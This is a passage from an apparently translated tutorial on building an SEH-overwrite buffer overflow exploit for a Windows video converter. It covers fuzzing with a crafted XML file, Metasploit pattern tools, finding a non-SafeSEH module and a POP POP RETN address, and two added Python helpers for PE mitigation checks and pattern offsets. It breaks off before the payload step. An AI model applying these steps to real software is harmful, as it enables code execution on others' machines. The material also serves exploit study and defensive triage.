2. Copy the XML file into the directory of any video converter, open the application under OllyDbg and run it, then open any video.
Look at the ESP register: it points at the 'A' characters from the buffer.
To get past the exception and reach the EIP overwrite, open the SEH chain and press Shift+F9.
3. Now create the pattern.
Open a console and type:
#cd /opt/metasploit/msf3/tools
#./pattern_create.rb 1000
Copy the output into the fuzzer.
Run the fuzzer, copy the XML file into the video directory again, then open any video via OllyDbg.
To get past the exception, go to the SEH chain and press Shift+F9.
4. Next, find a module whose address can be used for the jump when the SEH address is overwritten.
Select Executable modules -> DVCapture.dll and copy it to BackTrack via the VirtualBox shared-folder feature.
Here I saved it in my directory /Worked.
#cd /opt/metasploit/msf3/
#./msfpescan -i /media/Worked/dvcapture.dll | grep SEHandler
#./msfpescan -i /media/Worked/dvcapture.dll | grep DllCharacteristics
This module has no SEH protection (no SafeSEH), so it can be used for the jump through the overwritten SEH address.
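The two grep commands above look at the same two PE header fields: the SEHandler table entry (which lives in the Load Config data directory) and the DllCharacteristics word. As an added example, not code from the original post or from Metasploit, the following Python script pulls both out of a PE file so the check can be repeated when auditing a build for missing mitigations. The PE image it parses is constructed in memory so the script runs offline; `parse_pe_mitigations()` accepts the raw bytes of any real PE32 or PE32+ file. A present Load Config directory is necessary but not sufficient for SafeSEH: msfpescan goes on to read SEHandlerTable/SEHandlerCount from that structure, which needs the RVA-to-file-offset mapping this short parser omits.

```python
"""Added example (not from the original post or from Metasploit): read the
PE header fields that decide whether a module carries SafeSEH and the other
DllCharacteristics mitigation flags.  The sample image is constructed in
memory, so the script runs offline.
"""
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP/NX compatible
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400        # image uses no SEH at all
LOAD_CONFIG_DIRECTORY = 10                      # data directory index


def parse_pe_mitigations(data: bytes) -> dict:
    """Return the mitigation-relevant header flags of a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                     # skip signature + COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                          # PE32
        ndirs_off, dirs_off = 92, 96
    elif magic == 0x20B:                        # PE32+
        ndirs_off, dirs_off = 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in both
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]
    load_cfg_size = 0
    if ndirs > LOAD_CONFIG_DIRECTORY:
        entry = opt + dirs_off + 8 * LOAD_CONFIG_DIRECTORY
        _rva, load_cfg_size = struct.unpack_from("<II", data, entry)
    return {
        "dll_characteristics": dllchar,
        "dynamic_base": bool(dllchar & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "nx_compat": bool(dllchar & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dllchar & IMAGE_DLLCHARACTERISTICS_NO_SEH),
        # The SafeSEH handler table lives in the Load Config directory; with a
        # zero-size directory the loader has nothing to validate handlers against.
        "load_config_present": load_cfg_size > 0,
    }


def lacks_safeseh(flags: dict) -> bool:
    """True when the image neither opts out of SEH nor carries a Load Config
    directory, i.e. the situation an empty `grep SEHandler` result reports."""
    return not flags["no_seh"] and not flags["load_config_present"]


def build_sample_pe(dllchar: int, load_config_size: int) -> bytes:
    """Constructed minimal PE32 image (headers only) for offline testing."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = bytearray(96 + 8 * 16)                # PE32 optional header + 16 dirs
    struct.pack_into("<H", opt, 0, 0x10B)       # Magic: PE32
    struct.pack_into("<H", opt, 70, dllchar)    # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)         # NumberOfRvaAndSizes
    rva = 0x1000 if load_config_size else 0
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_DIRECTORY, rva, load_config_size)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), 0x2102)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for label, image in (("unprotected", build_sample_pe(0x0000, 0)),
                         ("hardened", build_sample_pe(0x0140, 0x48))):
        flags = parse_pe_mitigations(image)
        print(label, flags, "lacks SafeSEH:", lacks_safeseh(flags))
```

Run it against `open("dvcapture.dll", "rb").read()` to compare with the msfpescan output; a module that reports `lacks_safeseh` True is one the developers should rebuild with /SAFESEH (and, for the other two flags, /NXCOMPAT and /DYNAMICBASE).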
5. Now compute the pattern offset.
As usual:
#cd /opt/metasploit/msf3/tools
#./pattern_offset.rb 316C4130
332
Don't forget to set a breakpoint on the SEH address:
Executable modules -> dvcapture.dll
right-click and select Search for -> Sequence of commands
POP r32
POP r32
RETN
then press Find.
Next, right-click the result and set a breakpoint.
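Steps 3 and 5 above lean on two Metasploit scripts. As an added example, not code from the original post or from Metasploit, here is a short Python re-implementation of the cyclic pattern that `pattern_create.rb` emits and the lookup `pattern_offset.rb` performs, so the value 332 reported above can be reproduced: the debugger shows the overwriting value as `316C4130`, which in memory is the little-endian byte string `0Al1`, and that string first occurs 332 characters into the pattern.

```python
"""Added example (not from the original post or from Metasploit): Python
re-implementation of pattern_create / pattern_offset to reproduce the "332".
"""
import string
import struct


def pattern_create(length: int) -> str:
    """Metasploit-style pattern: Aa0Aa1...Aa9Ab0Ab1... cut to `length` chars.

    The upper/lower/digit triplets never repeat within the full
    20280-character sequence, so a 4-byte register value maps back to a
    single offset.
    """
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value_hex: str, length: int = 1000):
    """Offset of a crashed 32-bit register value inside the pattern, or None.

    The debugger prints the register big-endian ('316C4130') while the bytes
    sit in memory little-endian, so they are unpacked back to '0Al1' before
    the search.
    """
    raw = struct.pack("<I", int(value_hex, 16)).decode("latin-1")
    idx = pattern_create(length).find(raw)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    print(pattern_create(1000)[:30])
    print(pattern_offset("316C4130"))   # 332, as in the post
```

The same function is useful when triaging a crash dump on the defending side: feeding it the faulting handler value tells you how far into the attacker-controlled input the overwrite begins, which is the number to carry into the bug report.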
6. Edit the fuzzer.
Run the fuzzer, copy the XML file into the video directory on WinXP, then open it via OllyDbg.
Look at the SEH chain: the EIP register is now affected by the buffer (EIP CCCCCC).
Now put the dvcapture POP POP RETN address into the fuzzer.
After running it, look at the SEH chain (if the SEH chain leads into dvcapture, that is right and your fuzzer is successful).
7. Make the payload.
(still working....)